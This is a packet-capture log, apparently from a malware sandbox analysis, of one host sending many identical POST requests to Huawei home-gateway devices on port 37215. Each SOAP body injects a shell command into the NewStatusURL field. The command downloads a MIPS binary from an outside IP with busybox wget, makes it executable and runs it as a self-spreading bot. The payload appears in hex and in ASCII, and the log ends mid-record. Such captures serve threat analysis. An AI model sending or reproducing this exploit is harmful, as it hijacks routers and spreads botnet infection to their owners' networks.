                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1069192.168.2.133753443.131.145.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432311058 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1070192.168.2.1336460120.90.62.7537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432320118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1071192.168.2.1340086197.186.154.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432338953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1072192.168.2.1341628197.144.250.2137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432351112 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1073192.168.2.1340306197.177.82.13637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432368040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1074192.168.2.1334472157.162.224.9837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432384014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1075192.168.2.1345804152.189.33.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432400942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1076192.168.2.135964241.114.100.8037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432403088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1077192.168.2.1343338145.98.47.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432420015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1078192.168.2.1337744203.119.110.037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432430983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 